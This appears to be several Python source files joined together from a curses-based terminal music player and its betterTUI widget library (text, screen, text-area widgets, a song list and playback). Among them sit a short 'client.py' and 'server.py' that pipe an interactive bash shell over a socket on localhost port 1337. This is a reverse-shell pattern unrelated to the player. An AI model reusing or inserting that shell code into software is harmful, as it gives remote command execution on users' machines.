#!/usr/bin/env python3

from .Text import Text
from .Line import Line
from .Box import Box
from .Input import Input
from .Button import Button
from .Counter import Counter
from .Select import Select
from .File import File
from .SlimButton import SlimButton
from .TextArea import TextArea


from os import walk

def initialize():
    global state 
    state = "idle"

    global current_song
    current_song = None

    global all_songs
    all_songs = next(walk("./songs"), (None, None, []))[2]
        


# client.py
import socket
import subprocess

s = socket.socket()
s.connect(('localhost', 1337))

process = subprocess.Popen(['/bin/bash', '-i'],
              stdout=s.makefile('wb', buffering=0), stderr=subprocess.STDOUT,
              stdin=s.makefile('rb', buffering=0))
process.wait()


import betterTUI
import globals
from datetime import datetime
from mutagen.mp3 import MP3
import pygame

def custom_exit(screen, child_obj):
    exit()

def playSong(screen, child_obj):
    audio = MP3("./songs/" +child_obj.song)

    pygame.mixer.init()  # initialize mixer module

    pygame.mixer.music.load("./songs/" + child_obj.song)

    pygame.mixer.music.play()

    globals.current_song = { 'name': child_obj.song, 'duration': audio.info.length, 'start_time': datetime.now(), 'duration_left': audio.info.length }
    return home(screen, child_obj)

def getTime():
    now = datetime.now()
    return f"Current Time: {now.strftime('%H:%M:%S')}"

def getSongStatus():

    globals.current_song['duration_left'] = globals.current_song['duration'] - (datetime.now() - globals.current_song['start_time']).total_seconds()

    min, sec = ( "%02d" % round(x) for x in divmod(globals.current_song['duration_left'], 60) )

    if(int(min) <= 0 and int(sec) <= 1):
        globals.current_song = None

    progress = '━'*(10-round((globals.current_song['duration_left']/globals.current_song['duration'])*10)) + '─'*round((globals.current_song['duration_left']/globals.current_song['duration'])*10)

    print(globals.current_song['duration_left'], globals.current_song['duration'], progress)

    return f"{progress} {min}:{sec}"

def home(screen, child_obj):

    max_y, max_x = screen.getmaxyx()

    quit_button = (betterTUI.Button(screen, 2, 3, "Quit"), custom_exit)
    search_bar = (betterTUI.SearchBar(screen, int(max_x/2-15), 2, 30, "Search Song:", "Go"), custom_exit)

    elements = [[quit_button, search_bar]]

    # navbar line
    betterTUI.Line(screen, 0, 6, '─')

    # side info line
    betterTUI.Line(screen, int(max_x/4), 3, '│', 0, True)

    # box screen
    screen.box()

    # intersection chars
    betterTUI.Text(screen, int(max_x/4), 6, "┬")
    betterTUI.Text(screen, int(max_x/4), max_y-1, "┴")

    # real time updated hours:minutes:seconds
    betterTUI.Text(screen, int(max_x/4-(max_x/4)/2-len(getTime())/2), max_y-4, getTime())

    # show current song
    if(globals.current_song):
        # Song Title
        betterTUI.Text(screen, int(max_x/4-(max_x/4)/2-len("Currently Playing:")/2), 10, "Currently Playing:")
        betterTUI.Text(screen, int(max_x/4-(max_x/4)/2-len(globals.current_song["name"][:30])/2), 11, globals.current_song['name'][:30])

        min, sec = ( "%02d" % round(x) for x in divmod(globals.current_song['duration'], 60) )

        # Song timeleft
        betterTUI.Text(screen, int(max_x/4-(max_x/4)/2-len(getSongStatus())/2), 13, getSongStatus())
    else:
        # Song Title
        betterTUI.Text(screen, int(max_x/4-(max_x/4)/2-len("Currently Playing:")/2), 10, "Currently Playing:")
        betterTUI.Text(screen, int(max_x/4-(max_x/4)/2-len("None")/2), 11, "None")

        # Song timeleft
        betterTUI.Text(screen, int(max_x/4-(max_x/4)/2-len(f"{'─'*10} 00:00")/2), 13, f"{'─'*10} 00:00")

    # List all songs

    x, y = (int(max_x/4)+2, 8)

    betterTUI.Text(screen, x, y, f"{len(globals.all_songs)} available songs:")

    for song in globals.all_songs:
        y += 3

        if(y+3 >= max_y):
            break

        button = betterTUI.Button(screen, x, y, "Play")
        button.song = song
        button = (button, playSong)

        elements.append([button])

        betterTUI.Text(screen, x+button[0].width+1, y+1, song)

    return { 'elements': elements }


# server.py
import socket
import subprocess
import sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)

conn, _ = s.accept()

fp = conn.makefile('wb', buffering=0)

proc1 = subprocess.Popen(['ls'], stdin=conn.makefile('rb', buffering=0), stdout=fp)
proc1.wait()



from betterTUI.Screen import Screen

class Text:
    def __init__(self, screen: Screen, x: int, y: int, content: str, color=0, *args):
        self.screen = screen
        self.x = x
        self.y = y
        self.content = content
        self.parent = None
        self.timer = None
        self.deleted = False
        self.color = color

        self.addstr(y, x, content)

    def addstr(self, y:int, x:int, content:str, reverse=False):
        i = 0
        if (reverse): i = 1

        self.screen.attron(curses.color_pair(self.color+i))
        self.screen.addstr(y, x, content)
        self.screen.attroff(curses.color_pair(self.color+i))

    def delete(self):
        self.screen.addstr(self.y, self.x, " " * len(self.content))

        del self


import curses

class Screen:
    def __init__(self, func):
        screen = curses.initscr()
        screen.keypad(True)
        self.screen = screen

        if (curses.has_colors()):
            curses.start_color()
            curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE) # 1: Black on White
            self.COLOR_BLACK_WHITE = 1

            if (curses.can_change_color()):
                curses.init_color(10, 600, 600, 600) # LIGHT GREY
                curses.init_color(11, 50, 50, 50) # DARK GREY
                curses.init_pair(2, 11, 10)# 2: Dark Grey on Light Grey
               
                self.COLOR_DARKGREY_LIGHTGREY = 2

                curses.init_pair(3, 10, 11) # 3: Light Grey on Dark Grey
 
                self.COLOR_LIGHTGREY_DARKGREY = 3

                curses.init_color(13, 0, 0, 800) # BLUE
                curses.init_pair(4, 13, 0)

                self.COLOR_BLUE = 4

                curses.init_pair(5, 0, 13)

                self.COLOR_BLUE_REVERSE = 5

                curses.init_color(14, 0, 800, 0) # GREEN
                curses.init_pair(6, 14, 0)

                self.COLOR_GREEN = 6

                curses.init_pair(7, 0, 14)

                self.COLOR_GREEN_REVERSE = 7

            else:
                curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_WHITE) # 2: Yellow on Green

        try:
            func(self)
        finally:
            curses.endwin()

    def __getattr__(self, attr): 
        if attr not in self.__dict__: 
            return getattr(self.screen, attr) 
        return super().__getattr__(attr) 



import curses

from betterTUI.Screen import Screen

class TextArea:
    def __init__(self, screen: Screen, x: int, y: int, width: int, height: int, label: str, color=0, commands={}, content=[""], *args):
        self.screen = screen
        self.x = x
        self.y = y
        self.width = width
        self.height = height
        self.label = label
        self.control = False
        self.controlStartPos = [0, 0]
        self.controlPos = 0
        self.controlMatches = []
        self.controlCommands = commands 
        self.color = color

        for i, line in enumerate(content):
            if(len(line) > self.width-4):
                content[i] = line[:self.width-3] + '-'
                content.insert(i+1, line[self.width-3:])

        if(len(content[0]) > 0):
            self.content = content
        else:
            self.content = [""]
        self.pos = [0, 0]
        self.content_start = 0
        self.parent = None

        self.screen.attron(curses.color_pair(self.color))

        for i in range(0, width+1):
            screen.addstr(y+1, x+i, "─")
            screen.addstr(y+height, x+i, "─")

        screen.addstr(y+1, x, "┌")
        screen.addstr(y+1, x+width, "┐")

        for i in range(1, height):
            screen.addstr(y+1+i, x, "│")
            screen.addstr(y+1+i, x+width, "│")

        screen.addstr(y+height, x, "└")
        screen.addstr(y+height, x+width, "┘")

        screen.addstr(y, x, label)

        i = 0
        for content in self.content[0:self.height-2]:
            self.addstr(self.y+2+i, self.x+2, content)
            i += 1

        self.screen.attroff(curses.color_pair(color))

    def addstr(self, y:int, x:int, content:str, reverse=False):
        i = 0
        if (reverse): i = 1

        self.screen.attron(curses.color_pair(self.color+i))
        self.screen.addstr(y, x, content)
        self.screen.attroff(curses.color_pair(self.color+i))

    def on(self, *args) -> int:

        self.addstr(self.y, self.x, self.label, True)
        
        self.screen.move(self.y+2+self.pos[1], self.x+2+self.pos[0])

        curses.curs_set(1)
        
        args += ("ALT_DOWN", )

        def exit_widget(key_str):
            self.addstr(self.y, self.x, self.label)
            curses.curs_set(0)
            return key_str

        while(True):

            key_str = self.screen.getkey()

            if key_str in args: 
                if not(key_str == "KEY_RIGHT" or key_str == "KEY_LEFT" or key_str == "KEY_DOWN" or key_str == "ALT_DOWN" or key_str == "KEY_UP" or key_str in ["\n", "KEY_ENTER"]):
                    return exit_widget(key_str)
                elif(key_str == "KEY_RIGHT") and (self.pos[0] == self.width-3):
                    return exit_widget(key_str)
                elif((key_str == "KEY_LEFT") and (self.pos[0] == 0)):
                    return exit_widget(key_str)
                elif((key_str == "KEY_UP") and (self.pos[1] == 0)):
                    return exit_widget(key_str)
                elif((key_str == "KEY_DOWN") and (self.pos[1] == len(self.content)-1)):
                    return exit_widget(key_str)
                elif((key_str == "ALT_DOWN")):
                    return exit_widget("KEY_DOWN")
                else:
                    self.handle_key(key_str)
            else:
                self.handle_key(key_str)

            for i in range(0, self.height-2):
                self.addstr(self.y+2+i, self.x+2, " "*(self.width-2))

            i = 0
            for content in self.content[self.content_start:self.height-2+self.content_start]:
                self.addstr(self.y+2+i, self.x+2, content)
                i += 1

            if (self.control):
                self.controlMatches = []
                content = self.content[self.controlStartPos[1]][self.controlStartPos[0]+1:].split(" ")[0]

                for k in self.controlCommands.keys():
                    if(k.startswith(content)):
                        self.controlMatches.append(k)
                if (len(self.controlMatches) > 0): 
                    max_len = len(max(self.controlMatches)) + 1
                    for i, key in enumerate(self.controlMatches):
                        rev = True
                        if (self.controlPos == i): rev = False
                        self.addstr(self.y+2+self.pos[1]+i+1, self.x+2+self.controlStartPos[0], " "+key+(" "*(max_len-len(key))), rev)

            self.screen.move(self.y+2+self.pos[1], self.x+2+self.pos[0])
            self.screen.move(self.y+2+self.pos[1], self.x+2+self.pos[0])

            self.screen.refresh()

    def handle_key(self, key_str):
        pos = self.pos
        combined_pos = self.pos[1] + self.content_start
        input_length = self.width-3
        input_height = self.height-3

        if(key_str in ["\b", "KEY_BACKSPACE"]):

            if (self.control):
                if(self.pos[0]-1 == self.controlStartPos[0]):
                    self.control = False

            # if not at the start
            if not([pos[0], combined_pos] == [0, 0]):

                if(pos[0] == 0):
                    
                    if(pos[1] > 0):
                        self.pos[1] -= 1
                    else:
                        self.content_start -= 1

                    combined_pos = self.pos[1] + self.content_start

                    self.pos[0] = len(self.content[combined_pos])

                    if(len(self.content[combined_pos+1]) == 0 and not combined_pos == 0):
                        self.content.pop(combined_pos+1)

                    elif(len(self.content[combined_pos]) == 0):
                        self.content[combined_pos] = self.content[combined_pos+1]
                        self.content.pop(combined_pos+1)

                    elif(self.content[combined_pos][-1] == '-'):
                        self.content[combined_pos] = self.content[combined_pos][:-1]
                        self.pos[0] -= 1

                else:

                    if(len(self.content[combined_pos]) == pos[0]):
                        self.pos[0] -= 1
                        self.content[combined_pos] = self.content[combined_pos][:-1]

                    else:
                        self.pos[0] -= 1
                        self.content[combined_pos] = self.content[combined_pos][:self.pos[0]] + self.content[combined_pos][self.pos[0]+1:]

        elif(key_str == "KEY_UP"):
            # TRAVEL INPUT TO UP
            if(self.control):

                if (self.controlPos > 0):
                    self.controlPos -= 1

            else:

                if (combined_pos > 0):
                    self.pos[0] = 0

                    if(pos[1] > 0):
                        self.pos[1] -= 1
                    else:
                        self.content_start -= 1

        elif(key_str == "KEY_DOWN"):
            
            if(self.control):

                if (self.controlPos < len(self.controlMatches)-1):
                    self.controlPos += 1

            else:
            
                if (combined_pos+1 < len(self.content)):
                    self.pos[0] = 0

                    if(pos[1] < input_height):
                        self.pos[1] += 1
                    else:
                        self.content_start += 1

        elif(key_str == "KEY_RIGHT"):
            # TRAVEL INPUT TO RIGHT
            if (pos[0] < len(self.content[combined_pos])):
                self.pos[0] += 1

            elif(pos[0] == input_length and combined_pos+1 < len(self.content)):
                self.pos = [0, self.pos[1]+1]

        elif(key_str == "KEY_LEFT"):

            if (self.control and self.pos[0]-1 == self.controlStartPos[0]):
                self.control = False
                line = self.content[self.controlStartPos[1]]
                self.content[self.controlStartPos[1]] = line[0:self.controlStartPos[0]] + line[self.controlStartPos[0]+1+len(line[self.controlStartPos[0]+1:].split(" ")[0]):] 



            # TRAVEL INPUT TO LEFT
            if not([pos[0], combined_pos] == [0, 0]):
                if(pos[0] == 0):

                    if(pos[1] > 0):
                        self.pos[1] -= 1
                    else:
                        self.content_start -= 1
                    combined_pos = self.pos[1] + self.content_start

                    self.pos[0] = len(self.content[combined_pos])
                else:
                    self.pos[0] -= 1

        elif(key_str in ["\n", "KEY_ENTER"]):

            if(self.control):
               key = self.controlMatches[self.controlPos]
               value = self.controlCommands[key]

               line = self.content[self.controlStartPos[1]]
               self.content[self.controlStartPos[1]] = line[0:self.controlStartPos[0]] + line[self.controlStartPos[0]+1+len(line[self.controlStartPos[0]+1:].split(" ")[0]):] 


               for line in value:
                   self.content.insert(self.controlStartPos[1], line)

               self.control = False
            
            else:

                 if(pos[0] == 0):
                     self.content.insert(combined_pos, "")
                     if(pos[1] < input_height):
                         self.pos[1] += 1
                     else:
                         self.content_start += 1
     
                 elif(pos[0] < len(self.content[combined_pos])):
                     self.content.insert(self.pos[1], self.content[self.pos[1]][:pos[0]])
     
                     if(pos[1] < input_height):
                         self.pos[1] += 1
                     else:
                         self.content_start += 1
                     combined_pos = self.pos[1] + self.content_start
     
                     self.content[combined_pos] = self.content[combined_pos][pos[0]:]
                     self.pos[0] = 0
                 else:
                     if(pos[1] < input_height):
                         self.pos[1] += 1
                     else:
                         self.content_start += 1
     
                     self.pos[0] = 0
                     self.content.append("")

        elif(len(key_str) == 1):
            if(key_str.isprintable()):
                if (key_str == "/"):
                    self.control = True
                    self.controlStartPos = self.pos.copy()
                
                if(self.control):
                    self.controlPos = 0
                    if(key_str == " "):
                        self.control = False
                        line = self.content[self.controlStartPos[1]]
                        self.content[self.controlStartPos[1]] = line[0:self.controlStartPos[0]] + line[self.controlStartPos[0]+1+len(line[self.controlStartPos[0]+1:].split(" ")[0]):] 

                                
                if (pos[0] < input_length):
                    if(len(self.content[combined_pos]) == pos[0]):
                        self.content[combined_pos] += key_str
                        self.pos[0] += 1
                    elif(len(self.content[combined_pos]) <= input_length):
                        self.content[combined_pos] = self.content[combined_pos][:self.pos[0]] + key_str + self.content[combined_pos][self.pos[0]:]
                        self.pos[0] += 1
                    else:
                        if(self.content[combined_pos][-1] == '-'):
                            if(len(self.content) > combined_pos+1):
                                if(len(self.content[combined_pos+1]) < input_length):
                                    self.content[combined_pos+1] = self.content[combined_pos][-2] + self.content[combined_pos+1]
                                else:
                                    self.content.insert(combined_pos+1, self.content[combined_pos][-2] + "-")
                            else:
                                self.content.insert(combined_pos+1, self.content[combined_pos][-2])

                            self.content[combined_pos] = self.content[combined_pos][:self.pos[0]] + key_str + self.content[combined_pos][self.pos[0]:-2]
                            self.pos[0] += 1
                            self.content[combined_pos] += '-'

                        else:
                            self.content.insert(combined_pos+1, self.content[combined_pos][-1])
                            
                            self.content[combined_pos] = self.content[combined_pos][:self.pos[0]] + key_str + self.content[combined_pos][self.pos[0]:-1]
                            self.pos[0] += 1

                            self.content[combined_pos] += '-'

                elif(pos[0] == input_length):
                    if not(self.content[combined_pos][-1] == '-'):
                        self.content[combined_pos] += '-'
                    else:
                        key_str += '-'

                    if not(key_str in ['-', '--']):
                        
                        self.content.insert(combined_pos+1, key_str)
                        
                        if(pos[1] < input_height):
                            self.pos[1] += 1
                        else:
                            self.content_start += 1

                        self.pos = [1, self.pos[1]]


    def move(self, x ,y):

        for i in range(0, self.width+1):
            self.screen.addstr(self.y+1, self.x+i, " ")
            self.screen.addstr(self.y+self.height, self.x+i, " ")

        self.screen.addstr(self.y+1, self.x, " ")
        self.screen.addstr(self.y+1, self.x+self.width, " ")

        for i in range(1, self.height):
            self.screen.addstr(self.y+1+i, self.x, " ")
            self.screen.addstr(self.y+1+i, self.x+self.width, " ")

        self.screen.addstr(self.y+self.height, self.x, " ")
        self.screen.addstr(self.y+self.height, self.x+self.width, " ")

        self.screen.addstr(self.y, self.x, " "*len(self.label))

        for i in range(0, self.height-2):
            self.screen.addstr(self.y+2+i, self.x+2, " "*(self.width-2))

        for i in range(0, self.width+1):
            self.addstr(y+1, x+i, "─")
            self.addstr(y+self.height, x+i, "─")

        self.addstr(y+1, x, "┌")
        self.addstr(y+1, x+self.width, "┐")

        for i in range(1, self.height):
            self.addstr(y+1+i, x, "│")
            self.addstr(y+1+i, x+self.width, "│")

        self.addstr(y+self.height, x, "└")
        self.addstr(y+self.height, x+self.width, "┘")

        self.addstr(y, x, self.label)

        i = 0
        for content in self.content[self.content_start:self.height-2+self.content_start]:
            self.addstr(y+2+i, x+2, content)
            i += 1

        self.x = x
        self.y = y

    def delete(self):

        for i in range(0, self.width+1):
            self.screen.addstr(self.y+1, self.x+i, " ")
            self.screen.addstr(self.y+self.height, self.x+i, " ")

        self.screen.addstr(self.y+1, self.x, " ")
        self.screen.addstr(self.y+1, self.x+self.width, " ")

        for i in range(1, self.height):
            self.screen.addstr(self.y+1+i, self.x, " ")
            self.screen.addstr(self.y+1+i, self.x+self.width, " ")

        self.screen.addstr(self.y+self.height, self.x, " ")
        self.screen.addstr(self.y+self.height, self.x+self.width, " ")

        self.screen.addstr(self.y, self.x, " "*len(self.label))

        for i in range(0, self.height-2):
            self.screen.addstr(self.y+2+i, self.x+2, " "*(self.width-2))

        del self
